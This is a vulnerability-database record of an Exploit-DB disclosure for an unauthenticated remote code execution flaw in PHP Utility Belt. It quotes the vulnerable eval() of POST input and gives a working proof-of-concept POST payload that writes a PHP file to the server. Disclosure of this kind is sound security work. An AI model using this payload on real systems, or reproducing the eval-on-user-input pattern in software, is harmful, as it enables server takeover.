{"id": "EDB-ID:38901", "hash": "087a9ee9c01c0d0f254330a8b5d32df4", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP Utility Belt - Remote Code Execution", "description": "PHP Utility Belt - Remote Code Execution. Webapps exploit for php platform", "published": "2015-12-08T00:00:00", "modified": "2015-12-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/38901/", "reporter": "WICS", "references": [], "cvelist": [], "lastseen": "2016-02-04T09:05:17", "history": [], "viewCount": 26, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-02-04T09:05:17"}, "dependencies": {"references": [], "modified": "2016-02-04T09:05:17"}, "vulnersScore": -0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/38901/", "sourceData": "Exploit Title : PHP utility belt Remote Code Execution vulnerability\r\nAuthor : WICS\r\nDate : 8/12/2015\r\nSoftware Link : https://github.com/mboynes/php-utility-belt\r\n\r\nOverview:\r\n\r\n\r\nPHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.\r\najax.php is accessible without any authentication \r\n\r\nVulnerable code (Line number 12 to 15)\r\n\r\nif ( isset( $_POST['code'] ) ) {\r\n if ( false === eval( $_POST['code'] ) )\r\n echo 'PHP Error encountered, execution halted';\r\n}\r\n\r\n\r\nPOC\r\nAccess URL \r\nhttp://127.0.0.1/php-utility-belt/ajax.php\r\nin Post data type \r\ncode=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');\r\n\r\nabove code will generate info.php file which will display php info\r\nShell link will be \r\nhttp://127.0.0.1/php-utility-belt/info.php", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{}